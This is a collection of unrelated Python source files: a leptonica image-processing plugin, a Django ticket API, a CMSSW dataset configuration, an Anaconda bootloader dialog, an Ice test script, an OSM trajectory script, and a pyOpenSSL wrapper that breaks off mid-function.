# -*- coding: utf-8 -*-
"""
nidaba.plugins.leptonica
~~~~~~~~~~~~~~~~~~~~~~~~

Plugin accessing `leptonica <http://leptonica.com>`_ functions.

This plugin requires a liblept shared object in the current library search
path. On Debian-based systems it can be installed using apt-get

.. code-block:: console

    # apt-get install libleptonica-dev

Leptonica's APIs are rather unstable and may differ significantly between
versions. If this plugin fails with weird error messages or workers are just
dying without discernable cause please submit a bug report including your
leptonica version.
"""

from __future__ import unicode_literals, print_function, absolute_import

import ctypes

from nidaba import storage

from nidaba.celery import app
from nidaba.tasks.helper import NidabaTask
from nidaba.nidabaexceptions import (NidabaInvalidParameterException,
                                     NidabaLeptonicaException,
                                     NidabaPluginException)

leptlib = 'liblept.so'


def setup(*args, **kwargs):
    """Plugin setup hook: verify that the leptonica shared library loads.

    Raises:
        NidabaPluginException: liblept could not be loaded.
    """
    try:
        ctypes.cdll.LoadLibrary(leptlib)
    except Exception as e:
        # str(e) instead of e.message: BaseException.message was deprecated
        # in Python 2.6 and removed in Python 3.
        raise NidabaPluginException(str(e))


@app.task(base=NidabaTask, name=u'nidaba.binarize.sauvola',
          arg_values={'whsize': 'int', 'factor': (0.0, 1.0)})
def sauvola(doc, method=u'sauvola', whsize=10, factor=0.35):
    """
    Task wrapper around :func:`lept_sauvola`.

    Binarizes an 8bpp grayscale input document with Sauvola thresholding as
    described in Sauvola, Jaakko, and Matti Pietikäinen. "Adaptive document
    image binarization." Pattern recognition 33.2 (2000): 225-236.

    Args:
        doc (unicode): The input document tuple.
        method (unicode): The suffix string appended to all output files
        whsize (int): Local statistics are computed on a window twice the
                      width/height of this value. The minimal value is 2.
        factor (float): The threshold reduction factor due to variance,
                        0 =< factor < 1.

    Returns:
        (unicode, unicode): Storage tuple of the output file

    Raises:
        NidabaInvalidParameterException: Input parameters are outside the
                                         valid range.
    """
    src = storage.get_abs_path(*doc)
    dst = storage.insert_suffix(src, method, unicode(whsize),
                                unicode(factor))
    lept_sauvola(src, dst, whsize, factor)
    return storage.get_storage_path(dst)


def lept_sauvola(image_path, output_path, whsize=10, factor=0.35):
    """
    Binarizes an input document utilizing Sauvola thresholding as described in
    [0]. Expects 8bpp grayscale images as input.

    [0] Sauvola, Jaakko, and Matti Pietikäinen. "Adaptive document image
    binarization." Pattern recognition 33.2 (2000): 225-236.

    Args:
        image_path (unicode): Input image path
        output_path (unicode): Output image path
        whsize (int): The window width and height that local statistics are
                      calculated on are twice the value of whsize. The minimal
                      value is 2.
        factor (float): The threshold reduction factor due to variance. 0 =<
                        factor < 1.

    Raises:
        NidabaInvalidParameterException: Input parameters are outside the valid
                                         range.
        NidabaLeptonicaException: Loading, binarizing, or writing through
                                  leptonica failed.
    """
    if whsize < 2 or factor >= 1.0 or factor < 0:
        raise NidabaInvalidParameterException('Parameters ({}, {}) outside of valid range'.format(whsize, factor))
    try:
        lept = ctypes.cdll.LoadLibrary(leptlib)
    except OSError as e:
        # str(e): BaseException.message is deprecated (2.6) / removed (3.x).
        raise NidabaLeptonicaException('Loading leptonica failed: ' + str(e))
    pix = ctypes.c_void_p(lept.pixRead(image_path.encode('utf-8')))
    opix = ctypes.c_void_p()
    if lept.pixGetDepth(pix) != 8:
        lept.pixDestroy(ctypes.byref(pix))
        raise NidabaLeptonicaException('Input image is not grayscale')
    if lept.pixSauvolaBinarize(pix, whsize, ctypes.c_float(factor), 0, None,
                               None, None, ctypes.byref(opix)):
        lept.pixDestroy(ctypes.byref(pix))
        raise NidabaLeptonicaException('Binarization failed for unknown '
                                       'reason.')
    if lept.pixWriteImpliedFormat(output_path.encode('utf-8'), opix, 100, 0):
        # BUG FIX: the original destroyed ``pix`` twice here and leaked
        # ``opix``; destroy each PIX exactly once.
        lept.pixDestroy(ctypes.byref(pix))
        lept.pixDestroy(ctypes.byref(opix))
        raise NidabaLeptonicaException('Writing binarized PIX failed')
    lept.pixDestroy(ctypes.byref(opix))
    lept.pixDestroy(ctypes.byref(pix))


@app.task(base=NidabaTask, name=u'nidaba.img.dewarp')
def dewarp(doc, method=u'dewarp'):
    """
    Task wrapper around :func:`lept_dewarp`.

    Removes perspective distortion (as commonly exhibited by overhead scans)
    from an 1bpp input image.

    Args:
        doc (unicode, unicode): The input document tuple.
        method (unicode): The suffix string appended to all output files.

    Returns:
        (unicode, unicode): Storage tuple of the output file
    """
    src = storage.get_abs_path(*doc)
    dst = storage.insert_suffix(src, method)
    lept_dewarp(src, dst)
    return storage.get_storage_path(dst)


def lept_dewarp(image_path, output_path):
    """
    Removes perspective distortion from an 1bpp input image.

    Args:
        image_path (unicode): Path to the input image
        output_path (unicode): Path to the output image

    Raises:
        NidabaLeptonicaException if one of leptonica's functions failed.
    """
    try:
        lept = ctypes.cdll.LoadLibrary(leptlib)
    except OSError as e:
        # str(e): BaseException.message is deprecated (2.6) / removed (3.x).
        raise NidabaLeptonicaException('Loading leptonica failed: ' + str(e))
    pix = ctypes.c_void_p(lept.pixRead(image_path.encode('utf-8')))
    opix = ctypes.c_void_p()
    ret = lept.dewarpSinglePage(pix, 0, 1, 1, ctypes.byref(opix), None, 0)
    # NOTE(review): a ctypes int result is never None in practice; the
    # significant failure signal is ret == 1.
    if ret == 1 or ret is None:
        lept.pixDestroy(ctypes.byref(pix))
        lept.pixDestroy(ctypes.byref(opix))
        raise NidabaLeptonicaException('Dewarping failed for unknown reason.')
    if lept.pixWriteImpliedFormat(output_path.encode('utf-8'), opix, 100, 0):
        lept.pixDestroy(ctypes.byref(pix))
        lept.pixDestroy(ctypes.byref(opix))
        raise NidabaLeptonicaException('Writing dewarped PIX failed')
    lept.pixDestroy(ctypes.byref(pix))
    lept.pixDestroy(ctypes.byref(opix))


@app.task(base=NidabaTask, name=u'nidaba.img.deskew')
def deskew(doc, method=u'deskew'):
    """
    Task wrapper around :func:`lept_deskew`.

    Removes skew (rotational distortion) from an 1bpp input image.

    Args:
        doc (unicode, unicode): The input document tuple.
        method (unicode): The suffix string appended to all output files.

    Returns:
        (unicode, unicode): Storage tuple of the output file
    """
    src = storage.get_abs_path(*doc)
    dst = storage.insert_suffix(src, method)
    lept_deskew(src, dst)
    return storage.get_storage_path(dst)


def lept_deskew(image_path, output_path):
    """
    Removes skew (rotational distortion) from an 1bpp input image.

    Args:
        image_path (unicode): Input image
        output_path (unicode): Path to the output document

    Raises:
        NidabaLeptonicaException if one of leptonica's functions failed.
    """
    try:
        lept = ctypes.cdll.LoadLibrary(leptlib)
    except OSError as e:
        # str(e): BaseException.message is deprecated (2.6) / removed (3.x).
        raise NidabaLeptonicaException('Loading leptonica failed: ' + str(e))
    pix = ctypes.c_void_p(lept.pixRead(image_path.encode('utf-8')))
    opix = ctypes.c_void_p(lept.pixFindSkewAndDeskew(pix, 4, None, None))
    # BUG FIX: a c_void_p instance is never ``None`` itself, so the original
    # ``opix is None`` check could never fire. A NULL PIX pointer makes the
    # c_void_p *falsy* (its .value is None), which is what we test here.
    if not opix:
        lept.pixDestroy(ctypes.byref(pix))
        raise NidabaLeptonicaException('Deskewing failed for unknown reason.')
    if lept.pixWriteImpliedFormat(output_path.encode('utf-8'), opix, 100, 0):
        lept.pixDestroy(ctypes.byref(pix))
        lept.pixDestroy(ctypes.byref(opix))
        raise NidabaLeptonicaException('Writing deskewed PIX failed')
    lept.pixDestroy(ctypes.byref(pix))
    lept.pixDestroy(ctypes.byref(opix))

# -*- coding: utf-8 -*-
#

from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.exceptions import MethodNotAllowed
from rest_framework.response import Response

from common.const.http import POST, PUT
from common.mixins.api import CommonApiMixin
from common.permissions import IsValidUser, IsOrgAdmin

from tickets import serializers
from tickets.models import Ticket
from tickets.permissions.ticket import IsAssignee, IsAssigneeOrApplicant, NotClosed


__all__ = ['TicketViewSet']


class TicketViewSet(CommonApiMixin, viewsets.ModelViewSet):
    """Ticket API.

    Plain REST create/update/destroy are disabled; all mutations go
    through the explicit workflow actions ``open``, ``approve``,
    ``reject`` and ``close``.
    """
    permission_classes = (IsValidUser,)
    serializer_class = serializers.TicketDisplaySerializer
    serializer_classes = {
        'open': serializers.TicketApplySerializer,
        'approve': serializers.TicketApproveSerializer,
    }
    filterset_fields = [
        'id', 'title', 'type', 'action', 'status', 'applicant', 'applicant_display', 'processor',
        'processor_display', 'assignees__id'
    ]
    search_fields = [
        'title', 'action', 'type', 'status', 'applicant_display', 'processor_display'
    ]

    # --- default write endpoints are blocked ---

    def create(self, request, *args, **kwargs):
        raise MethodNotAllowed(self.action)

    def update(self, request, *args, **kwargs):
        raise MethodNotAllowed(self.action)

    def destroy(self, request, *args, **kwargs):
        raise MethodNotAllowed(self.action)

    def get_queryset(self):
        # Users only ever see tickets they are related to.
        return Ticket.get_user_related_tickets(self.request.user)

    def perform_create(self, serializer):
        # Invoked by the `open` action through super().create().
        ticket = serializer.save()
        ticket.open(applicant=self.request.user)

    # --- workflow actions ---

    @action(detail=False, methods=[POST], permission_classes=[IsValidUser, ])
    def open(self, request, *args, **kwargs):
        """Create a ticket and start its workflow."""
        return super().create(request, *args, **kwargs)

    @action(detail=True, methods=[PUT], permission_classes=[IsOrgAdmin, IsAssignee, NotClosed])
    def approve(self, request, *args, **kwargs):
        """Apply the update, then mark the ticket approved by this user."""
        response = super().update(request, *args, **kwargs)
        ticket = self.get_object()
        ticket.approve(processor=self.request.user)
        return response

    @action(detail=True, methods=[PUT], permission_classes=[IsOrgAdmin, IsAssignee, NotClosed])
    def reject(self, request, *args, **kwargs):
        """Mark the ticket rejected by this user and return its state."""
        ticket = self.get_object()
        # Serializer is built first but .data is evaluated after reject(),
        # so the response reflects the post-transition state.
        serializer = self.get_serializer(ticket)
        ticket.reject(processor=request.user)
        return Response(serializer.data)

    @action(detail=True, methods=[PUT], permission_classes=[IsAssigneeOrApplicant, NotClosed])
    def close(self, request, *args, **kwargs):
        """Close the ticket on behalf of this user and return its state."""
        ticket = self.get_object()
        serializer = self.get_serializer(ticket)
        ticket.close(processor=request.user)
        return Response(serializer.data)

# CMSSW PoolSource configuration fragment: defines the input dataset for a
# QCD Pt 80-120 MuEnriched Spring14 MiniAOD sample.
import FWCore.ParameterSet.Config as cms

# -1 means "process every event available in the input files".
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring() 
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
# Primary input files (LFNs resolved by the site's storage catalog).
readFiles.extend( [
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/0A2744F9-FA05-E411-BD0C-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/0E936434-FD05-E411-81BF-F4CE46B27A1A.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/32E07232-FD05-E411-897C-00259073E522.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/3CE2B535-FB05-E411-919A-20CF307C98DC.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/48093276-FC05-E411-9EEE-001F296564C6.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/50B66FF3-FA05-E411-A937-001F296564C6.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/544B2DF7-FA05-E411-B91F-001F2965F296.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/54DB2FF7-FE05-E411-824B-00259073E522.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/56D1BC32-FD05-E411-A512-20CF3027A5EB.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/5AD70432-FC05-E411-906C-20CF3027A5CD.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/5C4FBFF4-FA05-E411-9767-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/5CF748F8-FC05-E411-814B-20CF3027A5A2.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/7806E24D-FC05-E411-8922-001F2965F296.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/7C16B231-FD05-E411-8E00-20CF3027A5EB.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/802452C1-FC05-E411-A969-00221983E092.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/8217E3BD-FC05-E411-B8C2-0025907277CE.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/8676BEF4-FA05-E411-B26A-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/8C1741F3-FA05-E411-B5B5-20CF3027A582.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/8C915AB8-FC05-E411-9EAF-F4CE46B27A1A.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/AA0FCBB0-FC05-E411-898D-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/B49383BA-FC05-E411-9914-F4CE46B27A1A.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/B6DAEFDD-FB05-E411-9851-20CF3027A5CD.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/C6F5C44F-FD05-E411-B86F-D48564592B02.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/C83B6B6C-FC05-E411-BAFD-D48564599CAA.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/CEF64C64-FD05-E411-A799-001F2965648A.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/D6C305FC-FA05-E411-9AF5-00259073E522.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/DE0FC6A4-FC05-E411-A2F9-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/E2D5AD33-FD05-E411-868A-D48564594F36.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/E63BCC43-FB05-E411-834E-D48564599CEE.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/EAD01F32-FD05-E411-91E4-20CF3027A5F4.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/F0A18D25-FC05-E411-8DFC-20CF3027A582.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/F0B8E6B6-FA05-E411-9DAE-20CF3027A5CD.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/F23A21C3-FD05-E411-9E29-A4BADB3D00FF.root' ] );


# No secondary (parent) input files are needed for this sample.
secFiles.extend( [
               ] )


#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <katzj@redhat.com>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_

from bootlocwidget import BootloaderLocationWidget

class AdvancedBootloaderWindow(InstallWindow):
    """Advanced boot loader configuration screen.

    Lets the user force LBA32 mode, supply extra kernel parameters and pick
    the boot device / drive order (via BootloaderLocationWidget).

    Indentation normalized to spaces throughout: the original mixed tabs and
    spaces, which breaks under ``python -tt`` and Python 3.
    """
    windowTitle = N_("Advanced Boot Loader Configuration")

    def __init__(self, ics):
        InstallWindow.__init__(self, ics)
        self.parent = ics.getICW().window


    def getPrev(self):
        pass


    def getNext(self):
        """Validate and commit the screen's settings to the bootloader."""
        # forcing lba32 can be a bad idea.. make sure they really want to
        if (self.forceLBA.get_active() and not self.bl.forceLBA32):
            rc = self.intf.messageWindow(_("Warning"),
                    _("Forcing the use of LBA32 for your bootloader when "
                      "not supported by the BIOS can cause your machine "
                      "to be unable to boot.\n\n"
                      "Would you like to continue and force LBA32 mode?"),
                                         type = "custom",
                                         custom_buttons = [_("Cancel"),
                                                           _("Force LBA32")])
            if rc != 1:
                raise gui.StayOnScreen

        # set forcelba
        self.bl.setForceLBA(self.forceLBA.get_active())
        # set kernel args
        self.bl.args.set(self.appendEntry.get_text())

        # set the boot device
        self.bl.setDevice(self.blloc.getBootDevice())

        # set the drive order
        self.bl.drivelist = self.blloc.getDriveOrder()


    # set up the vbox with force lba32 and kernel append
    def setupOptionsVbox(self):
        """Build self.options_vbox: the force-LBA32 checkbox plus the
        'General kernel parameters' entry."""
        self.options_vbox = gtk.VBox(False, 5)
        self.options_vbox.set_border_width(5)

        self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
        self.options_vbox.pack_start(self.forceLBA, False)
        self.forceLBA.set_active(self.bl.forceLBA32)

        label = gui.WrappingLabel(_("If you wish to add default options to the "
                                    "boot command, enter them into "
                                    "the 'General kernel parameters' field."))
        label.set_alignment(0.0, 0.0)
        self.options_vbox.pack_start(label, False)

        label = gui.MnemonicLabel(_("_General kernel parameters"))
        self.appendEntry = gtk.Entry()
        label.set_mnemonic_widget(self.appendEntry)
        args = self.bl.args.get()
        if args:
            self.appendEntry.set_text(args)
        box = gtk.HBox(False, 0)
        box.pack_start(label)
        box.pack_start(self.appendEntry)
        al = gtk.Alignment(0.0, 0.0)
        al.add(box)
        self.options_vbox.pack_start(al, False)


    def getScreen(self, anaconda):
        """Assemble and return the screen's top-level widget."""
        self.dispatch = anaconda.dispatch
        self.bl = anaconda.id.bootloader
        self.intf = anaconda.intf

        thebox = gtk.VBox (False, 10)

        # boot loader location bits (mbr vs boot, drive order)
        self.blloc = BootloaderLocationWidget(anaconda, self.parent)
        thebox.pack_start(self.blloc.getWidget(), False)

        thebox.pack_start (gtk.HSeparator(), False)

        # some optional things
        self.setupOptionsVbox()
        thebox.pack_start(self.options_vbox, False)

        return thebox

#!/usr/bin/env python
# **********************************************************************
#
# Copyright (c) 2003-2011 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************

import os, sys

# Locate the toplevel directory (the one containing scripts/TestUtil.py) by
# walking up from this script's own location.
path = [ ".", "..", "../..", "../../..", "../../../.." ]
head = os.path.dirname(sys.argv[0])
if len(head) > 0:
    path = [os.path.join(head, p) for p in path]
path = [os.path.abspath(p) for p in path if os.path.exists(os.path.join(p, "scripts", "TestUtil.py")) ]
if len(path) == 0:
    # BUG FIX: raising a plain string is a TypeError on modern Python
    # (string exceptions were removed); raise a real exception instead.
    raise RuntimeError("can't find toplevel directory!")
sys.path.append(os.path.join(path[0]))
from scripts import *

# Start from a clean Freeze database directory.
dbdir = os.path.join(os.getcwd(), "db")
TestUtil.cleanDbDir(dbdir)

client = os.path.join(os.getcwd(), "client")

if TestUtil.appverifier:
    TestUtil.setAppVerifierSettings([client])

# Run the test client with rollback warnings disabled; fails loudly if the
# client does not report success.
clientProc = TestUtil.startClient(client, ' --Freeze.Warn.Rollback=0 "%s"' % os.getcwd())
clientProc.waitTestSuccess()

if TestUtil.appverifier:
    TestUtil.appVerifierAfterTestEnd([client])

#!/usr/bin/python

import os
import sys
import re

# file name unified by the following rule:
# 1. always save the osm under ../osmFiles directory
# 2. the result automatically generate to ../trajectorySets
# 3.1. change variable "osmName", or
# 3.2. use command argument to specify osm file name
# 4. this script generates a set of paths, each of which includes a series of points,
#    and save in originOfLife folder for further parsing.

# also, please scroll down the very bottom to see what's the next step

osmName = 'San_Jose_20x20.osm'   # sample: 'ucla.osm'
#osmName = 'Los_Angeles_20x20.osm'   # sample: 'ucla.osm'
#osmName = 'ucla_5x5.osm'   # sample: 'ucla.osm'

optionAllowLoop = False   # most of the cases are building bounding boxes


# Command-line overrides: argv[1] = osm file name, argv[2] = '1' allows loops.
# (Indentation normalized to spaces; the original mixed tabs and spaces.)
if len(sys.argv) >= 2:
    osmName = sys.argv[1]
if len(sys.argv) >= 3:
    optionAllowLoop = (sys.argv[2] == '1')

inFile = '../../../Data/osmFiles/' + osmName
# Strip the file extension, if any, to build the output basename.
if len(osmName.split('.')) == 1:
    osmNameWoExt = osmName
else:
    osmNameWoExt = osmName[:-(1 + len(osmName.split('.')[-1]))]
outRootDir = '../../../Data/trajectorySets/'
outFile = outRootDir + osmNameWoExt + '.tfix'


print('input file = ' + inFile)
print('output file = ' + outFile)
print('')

# Hand the input path to the XQuery script through a fixed temp file; the
# context manager guarantees the handle is flushed and closed before basex
# reads it.
with open('/tmp/in', 'w') as f:
    f.write('<in>' + inFile + '</in>')

# the following command can be slow. a 3x3 mile^2 area takes 53 seconds to generate the result.
xmlWayDetail = outRootDir + 'originOfLife/' + osmNameWoExt + '.xml'
cmd = 'basex findWayTrajectory.xq > ' + xmlWayDetail
print('CMD: ' + cmd)
if os.path.isfile(xmlWayDetail):
    print('File existed. Skip.')
else:
    os.system(cmd)

# the next step should be executing the python3 ../makeElevSegMap.py with the input
# parameter outFile, but because of the relative folder path issue, integrating
# makeElevSegMap.py into this code needs to make big changes. So at this stage,
# we still stay on manually executing that script.


# OpenSSL is more stable than ssl,
# but OpenSSL's API is different from ssl's, so a wrapper is needed
import sys
import os


import OpenSSL
SSLError = OpenSSL.SSL.WantReadError

import select
import time
import socket
import logging

# Module-level cache of the chosen OpenSSL protocol name (e.g. "TLSv1_2");
# filled in lazily by SSLConnection.context_builder().
ssl_version = ''

class SSLConnection(object):
    """OpenSSL Connection Wrapper.

    Wraps an OpenSSL.SSL.Connection over a plain socket and retries
    want-read/want-write conditions with select(), presenting a mostly
    blocking, socket-like interface. Python 2 only (uses sys.exc_clear,
    socket._fileobject and sequence-style exception access).
    """

    def __init__(self, context, sock):
        # context: OpenSSL.SSL.Context; sock: the underlying plain socket.
        self._context = context
        self._sock = sock
        self._connection = OpenSSL.SSL.Connection(context, sock)
        # Count of file-like objects handed out by makefile(); close() only
        # tears the connection down once they are all released.
        self._makefile_refs = 0

    def __getattr__(self, attr):
        # Delegate unknown attributes to the wrapped OpenSSL connection.
        # NOTE(review): for the four internal names below this implicitly
        # returns None instead of raising AttributeError — confirm nothing
        # relies on that before changing it.
        if attr not in ('_context', '_sock', '_connection', '_makefile_refs'):
            return getattr(self._connection, attr)
    
    def __iowait(self, io_func, *args, **kwargs):
        """Run io_func, select()-waiting on the socket whenever OpenSSL
        reports it needs more I/O; gives up (returns None) once the socket
        timeout elapses or the fd reports an error condition."""
        timeout = self._sock.gettimeout() or 0.1
        fd = self._sock.fileno()
        time_start = time.time()
        while True:
            try:
                return io_func(*args, **kwargs)
            except (OpenSSL.SSL.WantReadError, OpenSSL.SSL.WantX509LookupError):
                sys.exc_clear()  # Python 2-only API
                _, _, errors = select.select([fd], [], [fd], timeout)
                if errors:
                    break
                time_now = time.time()
                if time_now - time_start > timeout:
                    break
            except OpenSSL.SSL.WantWriteError:
                sys.exc_clear()
                _, _, errors = select.select([], [fd], [fd], timeout)
                if errors:
                    break
                time_now = time.time()
                if time_now - time_start > timeout:
                    break
    
    def accept(self):
        """Accept a connection and wrap it in an OpenSSL connection.

        NOTE(review): this reads ``sock._context`` off the freshly accepted
        plain socket, which ordinarily has no such attribute — verify this
        code path is actually exercised.
        """
        sock, addr = self._sock.accept()
        client = OpenSSL.SSL.Connection(sock._context, sock)
        return client, addr
    
    def do_handshake(self):
        # Retry the TLS handshake until complete or timed out.
        self.__iowait(self._connection.do_handshake)
    
    def connect(self, *args, **kwargs):
        return self.__iowait(self._connection.connect, *args, **kwargs)
    
    def __send(self, data, flags=0):
        try:
            return self.__iowait(self._connection.send, data, flags)
        except OpenSSL.SSL.SysCallError as e:
            # Python 2 exceptions are indexable: e[0] is the errno-like code.
            if e[0] == -1 and not data:
                # errors when writing empty strings are expected and can be ignored
                return 0
            raise
    
    def __send_memoryview(self, data, flags=0):
        # Convert memoryview payloads to bytes before handing them to OpenSSL.
        if hasattr(data, 'tobytes'):
            data = data.tobytes()
        return self.__send(data, flags)
    
    # On Pythons older than 2.7.5 use the memoryview-converting variant
    # (presumably where pyOpenSSL cannot take buffer views — confirm).
    send = __send if sys.version_info >= (2, 7, 5) else __send_memoryview
    
    def recv(self, bufsiz, flags=0):
        """Receive up to bufsiz bytes; '' signals a closed connection."""
        # Drain already-decrypted bytes buffered inside OpenSSL first.
        pending = self._connection.pending()
        if pending:
            return self._connection.recv(min(pending, bufsiz))
        try:
            return self.__iowait(self._connection.recv, bufsiz, flags)
        except OpenSSL.SSL.ZeroReturnError:
            # Clean TLS shutdown from the peer.
            return ''
        except OpenSSL.SSL.SysCallError as e:
            if e[0] == -1 and 'Unexpected EOF' in e[1]:
                # errors when reading empty strings are expected and can be ignored
                return ''
            raise
    
    def read(self, bufsiz, flags=0):
        return self.recv(bufsiz, flags)
    
    def write(self, buf, flags=0):
        return self.sendall(buf, flags)
    
    def close(self):
        # Only really close once every makefile() handle has been released.
        if self._makefile_refs < 1:
            self._connection = None
            if self._sock:
                # Call the base socket close directly on the wrapped socket.
                socket.socket.close(self._sock)
        else:
            self._makefile_refs -= 1
    
    def makefile(self, mode='r', bufsize=-1):
        # Each file object shares this connection; track it for close().
        self._makefile_refs += 1
        return socket._fileobject(self, mode, bufsize, close=True)
    
    @staticmethod
    def context_builder(ca_certs=None, cipher_suites=('ALL:!RC4-SHA:!ECDHE-RSA-RC4-SHA:!ECDHE-RSA-AES128-GCM-SHA256:!AES128-GCM-SHA256',)):
        """Build an OpenSSL context using the newest TLS method available.

        With ca_certs, peer certificates are verified against that bundle;
        otherwise verification is disabled. The verify callbacks just return
        OpenSSL's own verdict (``ok``).
        """
        # 'ALL', '!aNULL', '!eNULL'
        global  ssl_version

        # Pick the protocol once and cache it module-wide.
        if not ssl_version:
            if hasattr(OpenSSL.SSL, "TLSv1_2_METHOD"):
                ssl_version = "TLSv1_2"
            elif hasattr(OpenSSL.SSL, "TLSv1_1_METHOD"):
                ssl_version = "TLSv1_1"
            elif hasattr(OpenSSL.SSL, "TLSv1_METHOD"):
                ssl_version = "TLSv1"
            else:
                ssl_version = "SSLv23"

            # Forced downgrade on macOS — reason not recorded here.
            if sys.platform == "darwin":
